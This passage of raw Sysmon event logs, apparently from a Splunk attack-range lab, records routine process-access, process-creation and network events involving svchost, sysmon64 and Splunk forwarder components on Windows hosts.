10:59:49.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-13A5-6216-9D04-000000003902}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13A5-6216-9D04-000000003902}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.879{4F8D34B0-13A5-6216-9D04-000000003902}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.800{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6F04B08F0780ACFCA7416689862D512,SHA256=981CDA101EC9910AD7E2D038701C43FEE857AE0ED5EC12A55DA70C4BB659FE82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:49.229{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62E06E6A57FC659A5B0BAED5917A0687,SHA256=1B34A9C1B445945EC878580B9BCBD775A3C31C079532348D99C7328AD4C509AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.706{4F8D34B0-13A5-6216-9C04-000000003902}18843392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000218253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:46.607{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51447-false10.0.1.12-8000- 10341000x8000000000000000218252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13A5-6216-9C04-000000003902}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-13A5-6216-9C04-000000003902}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13A5-6216-9C04-000000003902}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 